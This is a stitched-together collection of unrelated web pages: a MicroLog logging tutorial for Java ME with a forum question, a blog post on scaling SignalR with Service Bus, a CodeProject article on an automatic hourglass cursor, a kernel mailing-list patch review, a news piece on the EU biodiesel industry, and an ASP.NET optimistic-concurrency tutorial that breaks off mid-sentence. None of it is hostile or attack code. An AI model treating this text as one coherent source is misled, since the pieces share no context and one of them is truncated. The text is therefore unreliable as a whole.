To format a message, an Appender must have an associated Formatter object. MicroLog has two different formatters: (1) The SimpleFormatter is the default and the simplest formatter, and (2) the PatternFormatter offers more flexibility for choosing which information will appear in the log message. If you are not satisfied with them, you can also create your own formatter class (discussed later) and define your own message format. Formatters implement the same interface (Formatter), which can be seen in the following Figure. The format() method is where the formatting of the message really occurs, where we have the logger name, the logger level, a related message and a throwable object.
The following steps show how to associate a formatter to an appender reference (in this context, the log messages will be sent to the console).
Logger log = LoggerFactory.getLogger("Logger With SimpleFormatter");
ConsoleAppender appender = new ConsoleAppender(); //creates a Console appender
Formatter formatter = new SimpleFormatter(); //creates a simpleFormatter
appender.setFormatter(formatter); //adds a formatter to a specific appender
log.addAppender(appender); //adds the appender to the logger
log.debug("Constructed object!"); //logs a message
The SimpleFormatter would print:
0:[DEBUG]-Constructed object!
As we can see, the SimpleFormatter is very simple. However, the PatternFormatter offers a more sofisticated way to format log messages. It works by defining your own formatting pattern, where you can choose which information will be in the message. For instance, consider our next example:
Logger log = LoggerFactory.getLogger();
PatternFormatter formatter = new PatternFormatter(); //Creates a PatternFormatter
formatter.setPattern("%t %d [%P] %m %T"); //specifies which data will be appended to the message
Appender appender = new ConsoleAppender();
appender.setFormatter(formatter);
log.addAppender(this.appender);
The message ouput would be:
Thread-0 12:54:18,815 [DEBUG] Starting app...
Note that the message format was constructed based on some "special characters" using formatter.setPattern(). The following list shows which types of characters you can use:
- %c - prints the name of the Logger
- %d - prints the date (absolute time)
- %m - prints the logged message
- %P -prints the priority, i.e. Level of the message.
- %r - prints the relative time of the logging. (The first logging is done at time 0.)
- %t - prints the thread name.
- %T - prints the Throwable object.
- %% - prints the '%' sign.
If you are not satiesfied with these two aforementioned formatters, you can also create your own one. For instance, let's say that we want to format a log message as follows:
$ sequenceNumber $ Log Level $ Message $
To create our own formatter, let's just implement the Formatter interface and define the message in the format method. The example defines an int primitive type (to show the sequence number) and a delimeter ($) to separete each data type (sequence number, log level and message).
public class MyFormatter implements Formatter {
private static final String DELIMETER = " $ ";
private int sequence;
private StringBuffer buffer;
public MyFormatter() {
this.sequence = 0; //the sequence of messages
this.buffer = new StringBuffer(); //message to be shown
}
public String format(String clientID, String name, long time, Level level,
Object message, Throwable t) {
this.buffer.delete(0, buffer.length()); //delete previously logged message
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(this.sequence++); //increments sequence message number
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(level); //appends the log level
this.buffer.append(DELIMETER); //appends delimeter
this.buffer.append(message); //appends log messages
this.buffer.append(DELIMETER); //appends delimeter
return buffer.toString(); //creates the entire log message
}
}
The result is:
$ 0 $ DEBUG $ Constructed object! $ $ 1 $ DEBUG $ Starting middlet... $
Using a Configuration File
MicroLog also offers mechanisms to insert your log configurations into a configuration file, instead of setting them within the software. The advantage of using external files is that changes in the log configurations do not imply to recompile the software. However, due to io instructions, the process can be slower.
The following listing shows a configuration file that sets the log level to WARN, uses two different appenders (console and file) and one formatter (PatternFormatter). The configuration file is called microlog.properties and can be saved into the /res project folder.
microlog.level=WARN microlog.appender=net.sf.microlog.core.appender.ConsoleAppender;net.sf.microlog.midp.appender.FileConnectionAppender microlog.formatter=net.sf.microlog.common.format.PatternFormatter microlog.formatter.PatternFormatter.name=MyFormatterName microlog.formatter.PatternFormatter.pattern=%c %d [%P] %m %T # End of file.
The PropertyConfigurator class is responsible for loading the configuration file.
public class PropertiesExample extends MIDlet {
private Logger log;
public PropertiesExample() {
this.log = LoggerFactory.getLogger();
PropertyConfigurator.configure("/microlog.properties"); //loads the configuration file
}
protected void destroyApp(boolean arg0) throws MIDletStateChangeException {}
protected void pauseApp() {}
protected void startApp() throws MIDletStateChangeException {
this.log.info("info");
this.log.error("Constructed object! erro");
this.log.debug("debug");
this.log.fatal("afta");
this.log.warn("warn");
}
}
The output can be one as shown below. First, note that only ERROR, FATAL and WARN messages were sent to the ouput, because we set our log level to WARN. Second, the log messages were also sent to a file, created at ///root1/microlog.txt.
Loading properties from /microlog.properties Added appender net.sf.microlog.core.appender.ConsoleAppender@1cb37664 Added appender net.sf.microlog.midp.appender.FileConnectionAppender@f828ed68 Using formatter class net.sf.microlog.common.format.PatternFormatter The created file is 20:34:43,151 [ERROR] Constructed object! error 20:34:44,119 [FATAL] afta 20:34:44,809 [WARN] warn
Finally, MicroLog framework seems to be a good contribution for the JavaME platform due to its simplicity (based on the Log4j framework) and the lack of good tools to debug JavaME applications when they are running in a real mobile device.
Featured article, October 11th 2009 (week 42)
Ekagga Technologies - Problem while integrating logger for s40 device Nokia Asha 501
am using Nokia Asha SDK 1.0. I am trying to integrate microlog to log into file using configuration file but i got the following error
jarFileName is java.lang.NoClassDefFoundError: net/sf/microlog/core/LoggerFactory
Here is my code :
and I have saved the microlog_file.properties file in /res folder of my project with following contents :
This is a simple Microlog configuration file microlog.level=DEBUG microlog.appender=FileAppender microlog.appender.FileAppender.filename=MemoryCard/micrologtestlog.txt microlog.formatter=net.sf.microlog.core.format.PatternFormatter microlog.formatter.PatternFormatter.pattern=[%P] %c %d (%r): %m %T
Thanks
If anyone have clue the post it please.
Ekagga Technologies (talk) 17:08, 3 October 2013 (EEST)
|
http://developer.nokia.com/community/wiki/Microlog_-_a_Log4j-based_tool_for_Java_ME
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
UPDATED LINK: (tl;dr)
Our friends over in the ASP.NET team are working on a very nice, lightweight web-browser eventing technology called SignalR. SignalR allows server-pushed events into the browser with a variety of transport options and a very simple programming model. You can get it via NuGet and/or see growing and get the source of on github. There is also a very active community around SignalR chatting on Jabbr.net, a chat system whose user model is derived from IRC, but that runs – surprise – on top of SignalR.
For a primer, check out the piece that Scott Hanselman wrote about SignalR a while back.
At the core, SignalR is a lightweight message bus that allows you to send messages (strings) identified by a key. Ultimately it’s a key/value bus. If you’re interested in messages with one or more particular keys, you walk up and ask for them by putting a (logical) connection into the bus – you create a subscription. And while you are maintaining that logical connection you get a cookie that acts as a cursor into the event stream keeping track of what you have an have not seen, which is particularly interesting for connectionless transports like long polling.
SignalR implements this simple pub/sub pattern as a framework and that works brilliantly and with great density, meaning that you can pack very many concurrent notification channels on a single box.
What SignalR, out-of-the-box, doesn’t (or didn’t) provide yet is a way to stretch its message bus across multiple nodes for even higher scale and for failover safety.
That’s where Service Bus comes in. msec more latency.
If you want to try it out, here are the steps (beyond getting the code):
In the above example, {namespace} is the Service Bus namespace you created following the tutorial steps, {account} is likely “owner” (to boot) and {key} is the default key you copied from the portal. {appname} is some string, without spaces, that disambiguates your app from other apps on the same namespace and 2 stands for splitting the Service Bus traffic across 2 topics.
Most of the SignalR samples don’t quite work yet in a scale-out mode since they hold local, per-node state. That’s getting fixed.
© Copyright 2014, Clemens Vasters - Powered by: newtelligence dasBlog 1.9.7067.0
|
http://vasters.com/clemensv/CommentView,guid,e8d14433-f773-4a19-91c0-138a9770a7c8.aspx
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
It's recommended practice to change the mouse cursor to
an hourglass wait cursor to inform the user that the program is
working on something. This is easy enough to do when the programmer
knows in advance that something is going to take a while.
However, there are often circumstances where you can't predict
how long something is going to take, so it's hard to know whether
to display the hourglass or not. Ideally, you'd like the cursor
to change to an hourglass automatically, as soon as your task had
run for more than some time limit, e.g. 1/10 of a second. I needed
to do this for a project of mine so I searched through my books and
the internet, but couldn't find any applicable code. The closest thing
I could find was an
article explaining how to do it in Java. It didn't seem
like it should be too tough to write a Windows/C++ version, but it
ended up taking me longer than I expected to get it working
properly so I thought I'd share the results.
The basic idea I had was to create a secondary
thread that would act as a "timer". The message loop
would keep resetting the timer so it normally wouldn't run out.
However, if a task took longer, then the timer would run out and the
secondary thread would change the cursor to an hourglass. It didn't' take
long to set this up, but mysteriously, it didn't work. A little debugging
reassured me that my code was working properly, but that the SetCursor call in
the secondary thread wasn't working. I guessed that SetCursor didn't work from
secondary threads, but a search of the MSDN documentation and the internet didn't
find anything about this. Finally, I posted a question to
comp.os.ms-windows.programmer.win32 and went home. The first few responses
I got didn't really help, but the third response turned out to be the key.
The message referred me to an article by Petter Hesselberg in the Nov. 2001
Windows Developers Journal - "The Right Time and Place for the Wait Cursor".
I couldn't find the article, but the
source-code
was online and the key turned out to be using AttachThreadInput. Once I added this
to my code, things started to work.
SetCursor
AttachThreadInput
I actually thought I was finished until I discovered that
when I pulled down a menu (or brought up a context menu) the cursor
changed to an hourglass. The problem was that while the menu was
displayed, my message loop wasn't running and so the timer wasn't getting
reset. After a certain amount of head scratching I came up with the idea
of using a GetMessage hook to reset the timer, since I figured the menu must
still be calling GetMessage (or PeekMessage). Sure enough this solved the menu
problem. (And probably some related issues like modal dialogs.)
GetMessage
PeekMessage
Again I thought I was finished, but I found one last glitch.
Just before a tool-tip appeared, the cursor flashed to an hourglass
and back. I guess tool-tips don't call GetMessage or PeekMessage while
they wait. I fixed this by simply making my timer longer than the tool-tip timer.
My last task was to extract the code, which I'd mixed
in with my message loop, into something more reusable. I ended up
packaging it into a C++ class. To use the class you simply have to create
an instance of it inside your message loop. Something like:
#include "awcursor.h"
...
while (GetMessage(&msg, NULL, 0, 0))
{
AutoWaitCursor awc;
TranslateMessage(&msg);
DispatchMessage(&msg);
}
The AutoWaitCursor constructor "starts" the
timer, and the destructor (called automatically at the end of the loop)
restores the cursor if necessary. The constructor also looks after creating
the thread and the hook the first time around.
AutoWaitCursor
If you look at the code, you may notice that the only concession I've made
to multi-threading is declaring several of the variables volatile. I don't make
any attempt to synchronize the threads or prevent them from accessing variables
at the same time. This was a deliberate choice, because I wanted to make
the code as fast as possible in order to not add overhead to the
message loop. How do I justify this? First, the variables are
plain integers, and therefore reading and writing them is atomic
anyway. Second, if in some rare case, a synchronization problem occurs,
the worst that can happen is the cursor might be wrong momentarily.
This is a small price to pay to keep the code simple and fast.
In practice I haven't seen any problems.
For simplicity, I've included the definition/initialization of
the static class members in the header file. This isn't the best
setup since it means you can't include this header in more than one
source file. Ideally, you'd put the definitions in a separate .cpp file.
However, you normally only have one message loop in your program anyway,
so this setup seems acceptable.
I hope you find the code and the explanation useful. Good luck!
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
while (GetMessage(&msg, NULL, 0, 0))
{
CWaitCursor wait;
TranslateMessage(&msg);
DispatchMessage(&msg);
}
myView.h:
{
private:
HCURSOR m_hCursor;
bool m_bMyCursorShape;
}
myView.cpp:
OnInitialUpdate()
{
...
SetClassLong(GetSafeHwnd(),
GCL_HCURSOR,
(LONG) NULL);
...
}
OnSetCursor(CWnd *pWnd, UINT nHitTest, UINT message)
{
if ( m_bMyCursorShape )
{
m_hCursor = LoadCursor(NULL, IDC_WAIT);
SetCursor(m_hCursor);
}
else
{
m_hCursor = LoadCursor(NULL, IDC_ARROW);
SetCursor(m_hCursor);
}
return CView::OnSetCursor(pWnd, nHitTest, message);
}
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
|
http://www.codeproject.com/Articles/1699/Auto-Wait-Cursor?msg=260041
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
John Simmons / outlaw programmer wrote:the code in that file merely kicks things off for a game.
The report of my death was an exaggeration - Mark Twain
Simply Elegant Designs JimmyRopes DesignsThink inside the box! ProActive Secure Systems
I'm on-line therefore I am.
JimmyRopes
public class Naerling : Lazy<Person>{
public void DoWork(){ throw new NotImplementedException(); }
}
Dalek Dave wrote:I would put £50 on the Dalai Lama if I was a Tibetan man.
delete this;
General News Suggestion Question Bug Answer Joke Rant Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
|
http://www.codeproject.com/Lounge.aspx?msg=4390117
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
29 December 2009 12:00 [Source: ICIS news]
By Florian Neuhof
LONDON (ICIS news)--The European biodiesel industry is no stranger in the hallways of bureaucratic power in ?xml:namespace>
In March 2009, lobbying by the European Biodiesel Board (EBB) led to the implementation of punitive import tariff on biodiesel coming into the EU from the
Then, in November, the board followed up this success with the announcement that it was to push for measures to stamp out the alleged practice of circumventing those tariffs by changing blend levels or re-routing
In the closing days of 2009, the EBB voiced further disgruntlement. Argentinean biodiesel producers, it claimed, where unfairly advantaged by taxes that incentivised the export of finished product over the shipping over soybean oil feedstock.
The board is likely to take further action on these “differentiated export taxes” (DETs) in January, by which time its official anti-circumvention complaint on US biodiesel should have been made to the EU.
Heavy lobbying is common fare in EU politics, especially when the subject at hand is even remotely related to agriculture. Yet the EBB’s vigorous defence of its members’ interests also highlights their vulnerability.
When the government started raising those taxes in 2008, sales took a nosedive. Industry body Verband der Deutschen Biokraftstoffindustrie (VDB) estimates that the amount of B100 sold in the German market in 2009 was down to 230,000 tonnes, from a peak of 1.84m tonnes in 2007.
The government has backed off a proposed further tax increase. But the fact remains that an industry reared on generous handouts is now hopelessly bloated, as vast overcapacity is undernourished by flagging demand. And without protectionist measures, European producers are struggling to compete with cheaper rivals abroad.
It remains to be seen how European producers will fare in 2010. But the new year holds some promise at least.
For a start, market sources predict that the EBB protestations will most likely bear fruit over the course of the year. Market participants believe that success in abolishing DETs could lead to a firming of prices.
In addition, imported feedstock could become cheaper. After soybean production in
Yet it remains to be seen how much of this feedstock finds its way to
An estimated 700,000 tonnes of soybean methyl Ester (SME) biodiesel will flow out of domestic use next year, much of which would otherwise have been earmarked for export into
In
In the
Despite its support of the industry in the past, not everything the EU does receives a favourable reception from producers in
The Renewable Energy Directive and the Fuel Quality Directive, agreed as part of the EU's climate change and energy package in December 2008, require the European Commission to compile a report "reviewing the impact of indirect land-use change on greenhouse gas emissions" and to seek ways to minimise it.
The deadline for the report is 30 June. There is much speculation in the market that palm oil, the feedstock of palm methyl ester (PME), will not be classified as renewable under the new guidelines.
Resulting uncertainty has acted as a deterrent for potential buyers. “A few weeks ago it would have been profitable to sell FAME,” says one producer, referring to the fatty acid methyl ester biodiesel, of which palm oil is a major component.
“But there were no buyers, as no one is willing to take on product which might not be usable under new regulation,” added the producer.
Like it or not, legislation is set to dominate the industry for some time yet.
For more on biodiesell visit ICIS chemical intelligence
|
http://www.icis.com/Articles/2009/12/29/9321855/OUTLOOK-10-Bloated-biodiesel-industry-on-EU-life-support.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
On Fri, Sep 03, 2010 at 07:29:26AM +0900, YONETANI Tomokazu wrote: > On Thu, Sep 02, 2010 at 06:27:57PM +0000, Pratyush Kshirsagar wrote: > > diff --git a/sys/vm/vm_map.c b/sys/vm/vm_map.c > > index a326037..4eb9026 100644 > > --- a/sys/vm/vm_map.c > > +++ b/sys/vm/vm_map.c > > @@ -3657,3 +3657,20 @@ DB_SHOW_COMMAND(procvm, procvm) > > } > > > > #endif /* DDB */ > > + > > +long vmap_resident_count(vm_map_t v) > > +{ > > + vm_map_entry_t entry; > > + vm_map_object_t *mobj; > > + vm_object_t obj; > > + long pres = 0; > > + entry = &(v->header); > > + while(entry->next != NULL){ > > + mobj = &entry->object; > > + if(mobj->vm_object != NULL) { > > + obj = mobj->vm_object; > > + pres = pres + (long) (obj->agg_pv_list_count / obj->resident_page_count); > > + } > > + } > > + return pres; > > +} > > The variable `entry' is not advanced in the loop, so it doesn't terminate > until a new element is appended to the current one. I mean, it doesn't terminate unless there's no next entry, or until the next entry is removed all of a sudden.
|
http://leaf.dragonflybsd.org/mailarchive/kernel/2010-09/msg00011.html
|
CC-MAIN-2014-52
|
en
|
refinedweb
|
For a web application that allows multiple users to edit data, there is the risk that two users may be editing the same data at the same time. In this tutorial we'll implement optimistic concurrency control to handle this risk.
Introduction. Without any concurrency policy in place, when two users are simultaneously editing a single record, the user who commits her changes last will override the changes made by the first.
For example, imagine that two users, Jisun and Sam, were both visiting a page in our application that allowed visitors to update and delete the products through a GridView control. Both click the Edit button in the GridView around the same time. Jisun changes the product name to "Chai Tea" and clicks the Update button. The net result is an
UPDATE statement that is sent to the database, which sets all of the product's updateable fields (even though Jisun only updated one field,
ProductName). At this point in time, the database has the values "Chai Tea," the category Beverages, the supplier Exotic Liquids, and so on for this particular product. However, the GridView on Sam's screen still shows the product name in the editable GridView row as "Chai". A few seconds after Jisun's changes have been committed, Sam updates the category to Condiments and clicks Update. This results in an
UPDATE statement sent to the database that sets the product name to "Chai," the
CategoryID to the corresponding Beverages category ID, and so on. Jisun's changes to the product name have been overwritten..
There are three concurrency control strategies available:
- Do Nothing -if concurrent users are modifying the same record, let the last commit win (the default behavior)
- Optimistic Concurrency - assume that while there may be concurrency conflicts every now and then, the vast majority of the time such conflicts won't arise; therefore, if a conflict does arise, simply inform the user that their changes can't be saved because another user has modified the same data
- Pessimistic Concurrency - assume that concurrency conflicts are commonplace and that users won't tolerate being told their changes weren't saved due to another user's concurrent activity; therefore, when one user starts updating a record, lock it, thereby preventing any other users from editing or deleting that record until the user commits their modifications
All of our tutorials thus far have used the default concurrency resolution strategy - namely, we've let the last write win. In this tutorial we'll examine how to implement optimistic concurrency control.
Note: We won't look at pessimistic concurrency examples in this tutorial series. Pessimistic concurrency is rarely used because such locks, if not properly relinquished, can prevent other users from updating data. For example, if a user locks a record for editing and then leaves for the day before unlocking it, no other user will be able to update that record until the original user returns and completes his update. Therefore, in situations where pessimistic concurrency is used, there's typically a timeout that, if reached, cancels the lock. Ticket sales websites, which lock a particular seating location for short period while the user completes the order process, is an example of pessimistic concurrency control.
Step 1: Looking at How Optimistic Concurrency is Implemented
Optimistic concurrency control works by ensuring that the record being updated or deleted has the same values as it did when the updating or deleting process started. For example, when clicking the Edit button in an editable GridView, the record's values are read from the database and displayed in TextBoxes and other Web controls. These original values are saved by the GridView. Later, after the user makes her changes and clicks the Update button, the original values plus the new values are sent to the Business Logic Layer, and then down to the Data Access Layer. The Data Access Layer must issue a SQL statement that will only update the record if the original values that the user started editing are identical to the values still in the database. Figure 2 depicts this sequence of events.
Figure 2: For the Update or Delete to Succeed, the Original Values Must Be Equal to the Current Database Values (Click to view full-size image)
There are various approaches to implementing optimistic concurrency (see Peter A. Bromberg's Optmistic Concurrency Updating Logic for a brief look at a number of options). The ADO.NET Typed DataSet provides one implementation that can be configured with just the tick of a checkbox. Enabling optimistic concurrency for a TableAdapter in the Typed DataSet augments the TableAdapter's
UPDATE and
DELETE statements to include a comparison of all of the original values in the
WHERE clause. The following
UPDATE statement, for example, updates the name and price of a product only if the current database values are equal to the values that were originally retrieved when updating the record in the GridView. The
@ProductName and
@UnitPrice parameters contain the new values entered by the user, whereas
@original_ProductName and
@original_UnitPrice contain the values that were originally loaded into the GridView when the Edit button was clicked:
UPDATE Products SET ProductName = @ProductName, UnitPrice = @UnitPrice WHERE ProductID = @original_ProductID AND ProductName = @original_ProductName AND UnitPrice = @original_UnitPrice
Note: This
UPDATE statement has been simplified for readability. In practice, the
UnitPrice check in the
WHERE clause would be more involved since
UnitPrice can contain
NULLs and checking if
NULL = NULL always returns False (instead you must use
IS NULL).
In addition to using a different underlying
UPDATE statement, configuring a TableAdapter to use optimistic concurrency also modifies the signature of its DB direct methods. Recall from our first tutorial, Creating a Data Access Layer, that DB direct methods were those that accepts a list of scalar values as input parameters (rather than a strongly-typed DataRow or DataTable instance). When using optimistic concurrency, the DB direct
Update() and
Delete() methods include input parameters for the original values as well. Moreover, the code in the BLL for using the batch update pattern (the
Update() method overloads that accept DataRows and DataTables rather than scalar values) must be changed as well.
Rather than extend our existing DAL's TableAdapters to use optimistic concurrency (which would necessitate changing the BLL to accommodate), let's instead create a new Typed DataSet named
NorthwindOptimisticConcurrency, to which we'll add a
Products TableAdapter that uses optimistic concurrency. Following that, we'll create a
ProductsOptimisticConcurrencyBLL Business Logic Layer class that has the appropriate modifications to support the optimistic concurrency DAL. Once this groundwork has been laid, we'll be ready to create the ASP.NET page.
Step 2: Creating a Data Access Layer That Supports Optimistic Concurrency
To create a new Typed DataSet, right-click on the
DAL folder within the
App_Code folder and add a new DataSet named
NorthwindOptimisticConcurrency. As we saw in the first tutorial, doing so will add a new TableAdapter to the Typed DataSet, automatically launching the TableAdapter Configuration Wizard. In the first screen, we're prompted to specify the database to connect to - connect to the same Northwind database using the
NORTHWNDConnectionString setting from
Web.config.
Figure 3: Connect to the Same Northwind Database (Click to view full-size image)
Next, we are prompted as to how to query the data: through an ad-hoc SQL statement, a new stored procedure, or an existing stored procedure. Since we used ad-hoc SQL queries in our original DAL, use this option here as well.
Figure 4: Specify the Data to Retrieve Using an Ad-Hoc SQL Statement (Click to view full-size image)
On the following screen, enter the SQL query to use to retrieve the product information. Let's use the exact same SQL query used for the
Products TableAdapter from our original DAL, which returns all of the
Product columns along with the product's supplier and category names: 5: Use the Same SQL Query from the
Products TableAdapter in the Original DAL (Click to view full-size image)
Before moving onto the next screen, click the Advanced Options button. To have this TableAdapter employ optimistic concurrency control, simply check the "Use optimistic concurrency" checkbox.
Figure 6: Enable Optimistic Concurrency Control by Checking the "Use optimistic concurrency" CheckBox (Click to view full-size image)
Lastly, indicate that the TableAdapter should use the data access patterns that both fill a DataTable and return a DataTable; also indicate that the DB direct methods should be created. Change the method name for the Return a DataTable pattern from GetData to GetProducts, so as to mirror the naming conventions we used in our original DAL.
Figure 7: Have the TableAdapter Utilize All Data Access Patterns (Click to view full-size image)
After completing the wizard, the DataSet Designer will include a strongly-typed
Products DataTable and TableAdapter. Take a moment to rename the DataTable from
Products to
ProductsOptimisticConcurrency, which you can do by right-clicking on the DataTable's title bar and choosing Rename from the context menu.
Figure 8: A DataTable and TableAdapter Have Been Added to the Typed DataSet (Click to view full-size image)
To see the differences between the
UPDATE and
DELETE queries between the
ProductsOptimisticConcurrency TableAdapter (which uses optimistic concurrency) and the Products TableAdapter (which doesn't), click on the TableAdapter and go to the Properties window. In the
DeleteCommand and
UpdateCommand properties'
CommandText subproperties you can see the actual SQL syntax that is sent to the database when the DAL's update or delete-related methods are invoked. For the
ProductsOptimisticConcurrency TableAdapter the
DELETE statement used is:
DELETE FROM [Products] WHERE (([ProductID] = @Original_ProductID) AND ([ProductName] = @Original_ProductName) AND ((@IsNull_SupplierID = 1 AND [SupplierID] IS NULL) OR ([SupplierID] = @Original_SupplierID)) AND ((@IsNull_CategoryID = 1 AND [CategoryID] IS NULL) OR ([CategoryID] = @Original_CategoryID)) AND ((@IsNull_QuantityPerUnit = 1 AND [QuantityPerUnit] IS NULL) OR ([QuantityPerUnit] = @Original_QuantityPerUnit)) AND ((@IsNull_UnitPrice = 1 AND [UnitPrice] IS NULL) OR ([UnitPrice] = @Original_UnitPrice)) AND ((@IsNull_UnitsInStock = 1 AND [UnitsInStock] IS NULL) OR ([UnitsInStock] = @Original_UnitsInStock)) AND ((@IsNull_UnitsOnOrder = 1 AND [UnitsOnOrder] IS NULL) OR ([UnitsOnOrder] = @Original_UnitsOnOrder)) AND ((@IsNull_ReorderLevel = 1 AND [ReorderLevel] IS NULL) OR ([ReorderLevel] = @Original_ReorderLevel)) AND ([Discontinued] = @Original_Discontinued))
Whereas the
DELETE statement for the Product TableAdapter in our original DAL is the much simpler:
DELETE FROM [Products] WHERE (([ProductID] = @Original_ProductID))
As you can see, the
WHERE clause in the
DELETE statement for the TableAdapter that uses optimistic concurrency includes a comparison between each of the
Product table's existing column values and the original values at the time the GridView (or DetailsView or FormView) was last populated. Since all fields other than
ProductID,
ProductName, and
Discontinued can have
NULL values, additional parameters and checks are included to correctly compare
NULL values in the
WHERE clause.
We won't be adding any additional DataTables to the optimistic concurrency-enabled DataSet for this tutorial, as our ASP.NET page will only provide updating and deleting product information. However, we do still need to add the
GetProductByProductID(productID) method to the
ProductsOptimisticConcurrency TableAdapter.
To accomplish this, right-click on the TableAdapter's title bar (the area right above the
Fill and
GetProducts method names) and choose Add Query from the context menu. This will launch the TableAdapter Query Configuration Wizard. As with our TableAdapter's initial configuration, opt to create the
GetProductByProductID(productID) method using an ad-hoc SQL statement (see Figure 4). Since the
GetProductByProductID(productID) method returns information about a particular product, indicate that this query is a
SELECT query type that returns rows.
Figure 9: Mark the Query Type as a "
SELECT which returns rows" (Click to view full-size image)
On the next screen we're prompted for the SQL query to use, with the TableAdapter's default query pre-loaded. Augment the existing query to include the clause
WHERE ProductID = @ProductID, as shown in Figure 10.
Figure 10: Add a
WHERE Clause to the Pre-Loaded Query to Return a Specific Product Record (Click to view full-size image)
Finally, change the generated method names to
FillByProductID and
GetProductByProductID.
Figure 11: Rename the Methods to
FillByProductID and
GetProductByProductID (Click to view full-size image)
With this wizard complete, the TableAdapter now contains two methods for retrieving data:
GetProducts(), which returns all products; and
GetProductByProductID(productID), which returns the specified product.
Step 3: Creating a Business Logic Layer for the Optimistic Concurrency-Enabled DAL
Our existing
ProductsBLL class has examples of using both the batch update and DB direct patterns. The
AddProduct method and
UpdateProduct overloads both use the batch update pattern, passing in a
ProductRow instance to the TableAdapter's Update method. The
DeleteProduct method, on the other hand, uses the DB direct pattern, calling the TableAdapter's
Delete(productID) method.
With the new
ProductsOptimisticConcurrency TableAdapter, the DB direct methods now require that the original values also be passed in. For example, the
Delete method now expects ten input parameters: the original
ProductID,
ProductName,
SupplierID,
CategoryID,
QuantityPerUnit,
UnitPrice,
UnitsInStock,
UnitsOnOrder,
ReorderLevel, and
Discontinued. It uses these additional input parameters' values in
WHERE clause of the
DELETE statement sent to the database, only deleting the specified record if the database's current values map up to the original ones.
While the method signature for the TableAdapter's
Update method used in the batch update pattern hasn't changed, the code needed to record the original and new values has. Therefore, rather than attempt to use the optimistic concurrency-enabled DAL with our existing
ProductsBLL class, let's create a new Business Logic Layer class for working with our new DAL.
Add a class named
ProductsOptimisticConcurrencyBLL to the
BLL folder within the
App_Code folder.
Figure 12: Add the
ProductsOptimisticConcurrencyBLL Class to the BLL Folder
Next, add the following code to the
ProductsOptimisticConcurrencyBLL class:
using System; using System.Data; using System.Configuration; using System.Web; using System.Web.Security; using System.Web.UI; using System.Web.UI.WebControls; using System.Web.UI.WebControls.WebParts; using System.Web.UI.HtmlControls; using NorthwindOptimisticConcurrencyTableAdapters; [System.ComponentModel.DataObject] public class ProductsOptimisticConcurrencyBLL { private ProductsOptimisticConcurrencyTableAdapter _productsAdapter = null; protected ProductsOptimisticConcurrencyTableAdapter Adapter { get { if (_productsAdapter == null) _productsAdapter = new ProductsOptimisticConcurrencyTableAdapter(); return _productsAdapter; } } [System.ComponentModel.DataObjectMethodAttribute (System.ComponentModel.DataObjectMethodType.Select, true)] public NorthwindOptimisticConcurrency.ProductsOptimisticConcurrencyDataTable GetProducts() { return Adapter.GetProducts(); } }
Note the using
NorthwindOptimisticConcurrencyTableAdapters statement above the start of the class declaration. The
NorthwindOptimisticConcurrencyTableAdapters namespace contains the
ProductsOptimisticConcurrencyTableAdapter class, which provides the DAL's methods. Also before the class declaration you'll find the
System.ComponentModel.DataObject attribute, which instructs Visual Studio to include this class in the ObjectDataSource wizard's drop-down list.
The
ProductsOptimisticConcurrencyBLL's
Adapter property provides quick access to an instance of the
ProductsOptimisticConcurrencyTableAdapter class, and follows the pattern used in our original BLL classes (
ProductsBLL,
CategoriesBLL, and so on). Finally, the
GetProducts() method simply calls down into the DAL's
GetProducts() method and returns a
ProductsOptimisticConcurrencyDataTable object populated with a
ProductsOptimisticConcurrencyRow instance for each product record in the database.
Deleting a Product Using the DB Direct Pattern with Optimistic Concurrency
When using the DB direct pattern against a DAL that uses optimistic concurrency, the methods must be passed the new and original values. For deleting, there are no new values, so only the original values need be passed in. In our BLL, then, we must accept all of the original parameters as input parameters. Let's have the
DeleteProduct method in the
ProductsOptimisticConcurrencyBLL class use the DB direct method. This means that this method needs to take in all ten product data fields as input parameters, and pass these to the DAL, as shown in the following code:
[System.ComponentModel.DataObjectMethodAttribute (System.ComponentModel.DataObjectMethodType.Delete, true)] public bool DeleteProduct (int original_productID, string original_productName, int? original_supplierID, int? original_categoryID, string original_quantityPerUnit, decimal? original_unitPrice, short? original_unitsInStock, short? original_unitsOnOrder, short? original_reorderLevel, bool original_discontinued) { int rowsAffected = Adapter.Delete(original_productID, original_productName, original_supplierID, original_categoryID, original_quantityPerUnit, original_unitPrice, original_unitsInStock, original_unitsOnOrder, original_reorderLevel, original_discontinued); // Return true if precisely one row was deleted, otherwise false return rowsAffected == 1; }
If the original values - those values that were last loaded into the GridView (or DetailsView or FormView) - differ from the values in the database when the user clicks the Delete button the
WHERE clause won't match up with any database record and no records will be affected. Hence, the TableAdapter's
Delete method will return
0 and the BLL's
DeleteProduct method will return
false.
Updating a Product Using the Batch Update Pattern with Optimistic Concurrency
As noted earlier, the TableAdapter's
Update method for the batch update pattern has the same method signature regardless of whether or not optimistic concurrency is employed. Namely, the
Update method expects a DataRow, an array of DataRows, a DataTable, or a Typed DataSet. There are no additional input parameters for specifying the original values. This is possible because the DataTable keeps track of the original and modified values for its DataRow(s). When the DAL issues its
UPDATE statement, the
@original_ColumnName parameters are populated with the DataRow's original values, whereas the
@ColumnName parameters are populated with the DataRow's modified values.
In the
ProductsBLL class (which uses our original, non-optimistic concurrency DAL), when using the batch update pattern to update product information our code performs the following sequence of events:
- Read the current database product information into a
ProductRowinstance using the TableAdapter's
GetProductByProductID(productID)method
- Assign the new values to the
ProductRowinstance from Step 1
- Call the TableAdapter's
Updatemethod, passing in the
ProductRowinstance
This sequence of steps, however, won't correctly support optimistic concurrency because the
ProductRow populated in Step 1 is populated directly from the database, meaning that the original values used by the DataRow are those that currently exist in the database, and not those that were bound to the GridView at the start of the editing process. Instead, when using an optimistic concurrency-enabled DAL, we need to alter the
UpdateProduct method overloads to use the following steps:
- Read the current database product information into a
